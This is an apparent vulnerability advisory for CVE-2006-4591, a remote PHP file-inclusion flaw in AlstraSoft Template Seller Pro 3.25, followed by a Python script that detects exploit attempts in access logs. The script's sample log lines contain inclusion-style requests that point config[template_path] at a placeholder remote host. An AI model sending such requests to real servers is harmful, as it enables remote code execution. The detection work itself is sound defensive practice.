Alstrasoft · Alstrasoft Template Seller Pro · CVE-2006-4591
**Name of the Vulnerable Software and Affected Versions**
AlstraSoft Template Seller versions prior to the fixed version
AlstraSoft Template Seller Pro version 3.25
**Description**
The issue allows remote attackers to execute arbitrary PHP code by supplying a URL in the `config[template_path]` parameter to specific API endpoints, such as `/payment/payment_result.php` or `/payment/spuser_result.php`.
**Recommendations**
For AlstraSoft Template Seller versions prior to the fixed version, update to the fixed version to resolve the issue.
For AlstraSoft Template Seller Pro version 3.25, update to a version that contains a fix for this issue.
As a temporary workaround, consider restricting access to the `payment_result.php` and `spuser_result.php` files until a patch is available.
Avoid using the `config[template_path]` parameter in the affected API endpoints until the issue is resolved.
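
One way to look for the requests described above in web server access logs, as an added example that is not from the advisory or the vendor. The combined log format, the sample lines and the `host.invalid` host are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoints and parameter named in the advisory.
AFFECTED = ("/payment/payment_result.php", "/payment/spuser_result.php")
PARAM = "config[template_path]"
# A value that starts with a scheme (http:, ftp:, php:, ...) or with "//".
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_value(target):
    """Return the URL-like value of config[template_path], or None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not path.endswith(AFFECTED):
        return None
    # parse_qsl decodes %5B/%5D, so an encoded parameter name matches too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Yield (client_ip, value) for each log line that matches."""
    for line in lines:
        m = REQUEST.search(line)
        if m:
            value = suspicious_value(m.group(1))
            if value is not None:
                yield line.split(" ", 1)[0], value

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /payment/payment_result.php?config[template_path]=http://host.invalid/x HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Jan/2024:10:00:05 +0000] "GET /payment/spuser_result.php?config%5Btemplate_path%5D=ftp%3A%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /payment/payment_result.php?order=42 HTTP/1.1" 200 901',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?config[template_path]=http://host.invalid/x HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(ip, value)
```

Only the query string is inspected, so a value sent in a POST body will not appear in an access log and needs request-body logging or a WAF rule instead.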